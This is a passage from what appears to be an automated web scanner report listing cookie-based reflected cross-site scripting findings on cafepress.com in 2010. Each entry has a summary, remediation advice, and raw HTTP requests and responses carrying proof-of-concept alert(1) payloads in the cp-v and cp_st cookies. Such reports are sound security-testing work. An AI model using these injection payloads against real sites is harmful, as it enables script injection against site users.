GET /+stadium-blanket HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=71ca1</script><script>alert(1)</script>6e6e4d328ee ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 59474 Date: Sun, 26 Dec 2010 13:49:15 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:15 GMT; path=/ Set-Cookie: cp_sc=201672; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:15 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59474 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '71ca1</script><script>alert(1)</script>6e6e4d328ee ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.60. http://www.cafepress.com/+steins [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+steins
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 747f7"-alert(1)-"1bd54518006 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+steins HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA747f7"-alert(1)-"1bd54518006 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW13 Cteonnt-Length: 58697 Date: Sun, 26 Dec 2010 13:47:30 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:29 GMT; path=/ Set-Cookie: cp_sc=100143; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:29 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58697 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA747f7"-alert(1)-"1bd54518006 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.61. http://www.cafepress.com/+steins [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+steins
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ddbad</script><script>alert(1)</script>e5bee7f619b was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+steins HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=ddbad</script><script>alert(1)</script>e5bee7f619b ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW19 Cteonnt-Length: 58719 Date: Sun, 26 Dec 2010 13:47:28 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:28 GMT; path=/ Set-Cookie: cp_sc=100143; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:28 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58719 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = 'ddbad</script><script>alert(1)</script>e5bee7f619b ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.62. http://www.cafepress.com/+stocking [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+stocking
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77a9a"-alert(1)-"6b71a0eba86 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+stocking HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA77a9a"-alert(1)-"6b71a0eba86 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW17 Cteonnt-Length: 59606 Date: Sun, 26 Dec 2010 13:49:02 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:02 GMT; path=/ Set-Cookie: cp_sc=201674; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:02 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59606 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA77a9a"-alert(1)-"6b71a0eba86 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.63. http://www.cafepress.com/+stocking [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+stocking
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd3b0</script><script>alert(1)</script>6a078ca5ef1 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+stocking HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=cd3b0</script><script>alert(1)</script>6a078ca5ef1 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW21 Cteonnt-Length: 59633 Date: Sun, 26 Dec 2010 13:49:00 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:00 GMT; path=/ Set-Cookie: cp_sc=201674; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:00 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59633 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = 'cd3b0</script><script>alert(1)</script>6a078ca5ef1 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.64. http://www.cafepress.com/+sweatshirts-hoodies [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+sweatshirts-hoodies
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9849b"-alert(1)-"0b830c7e51f was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+sweatshirts-hoodies HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
